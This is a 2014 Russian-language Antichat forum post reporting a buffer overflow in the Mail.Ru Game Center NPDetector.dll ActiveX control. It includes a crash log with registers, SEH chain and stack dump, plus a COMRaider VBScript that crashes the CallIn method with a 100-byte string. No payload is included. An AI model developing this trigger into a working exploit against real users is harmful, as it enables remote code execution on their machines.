Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Mail гейм центр (https://forum.antichat.xyz/showthread.php?t=408095)

uniksoft 10.03.2014 09:32
C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAMEC E~1\NPDETE~1.DLL переполнение происходит уже при 100 байтах

кто захочет проверить

--- добавлено: 4 янв 2014 в 18:34 ---

логи

Exception Code: 0x406D1388

Disasm: 7C812AEBPOP ESI(KERNEL32.dll)

Seh Chain:

--------------------------------------------------

1B08C2BNPDetector.dll

2B08C4BNPDetector.dll

3B126DDNPDetector.dll

4B10A50NPDetector.dll

5B10A9ANPDetector.dll

6AE5BD4NPDetector.dll

77C839AC0KERNEL32.dll

Called From Returns To

--------------------------------------------------

KERNEL32.7C812AEB NPDetector.B08C21

NPDetector.B08C21 NPDetector.B12691

NPDetector.B12691 NPDetector.B10A46

NPDetector.B10A46 NPDetector.AE6222

NPDetector.AE6222 KERNEL32.7C80B713

Registers:

--------------------------------------------------

EIP 7C812AEB -> 406D1388

EAX 0196FEB4 -> 406D1388

EBX 0182F48C -> Uni: TICClientThread

ECX 00000000

EDX 0181290C -> Asc: TICClientThread

EDI 0013D9C4 -> 7C91540B

ESI 0196FF50 -> 0181290C

EBP 0196FF04 -> 0196FF54

ESP 0196FEB0 -> 00000000

Block Disassembly:

--------------------------------------------------

7C812ADBLEA EDI,[EBP-3C]

7C812ADEREP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]

7C812AE0POP EDI

7C812AE1LEA EAX,[EBP-50]

7C812AE4PUSH EAX

7C812AE5CALL [7C801510]

7C812AEBPOP ESI 00001000

EBP+240196FF28 -> 0196FF5C

EBP+2800B08C2B -> FDC9A0E9

Stack Dump:

--------------------------------------------------

196FEB0 00 00 00 00 88 13 6D 40 00 00 00 00 00 00 00 00 [......m.........]

196FEC0 EB 2A 81 7C 04 00 00 00 00 10 00 00 0C 29 81 01 [................]

196FED0 FF FF FF FF 00 00 00 00 8D 64 AE 00 00 00 00 00 [.........d......]

196FEE0 00 00 00 00 0F 00 00 00 0C 29 81 01 0F 00 00 00 [................]

196FEF0 0F 00 00 00 E3 04 00 00 1C FF 96 01 EC 66 AE 00 [.............f..]









'File Generated by COMRaider v0.0.133

'Wscript.echo typename(target)

'for debugging/custom prolog

targetFile = "C:\DOCUME~1\9335~1\LOCALS~1\APPLIC~1\Mail.Ru\GAME CE~1\NPDETE~1.DLL"

prototype = "Function CallIn ( ByVal Version As Long , ByVal DataType As String , ByVal Data As String ) As Long"

memberName = "CallIn"

progid = "NPDetector.GameCenterDetector"

argCount = 3

arg1=1

arg2="defaultV"

arg3=String(100, "A")

target.CallIn arg1 ,arg2 ,arg3


Время: 20:58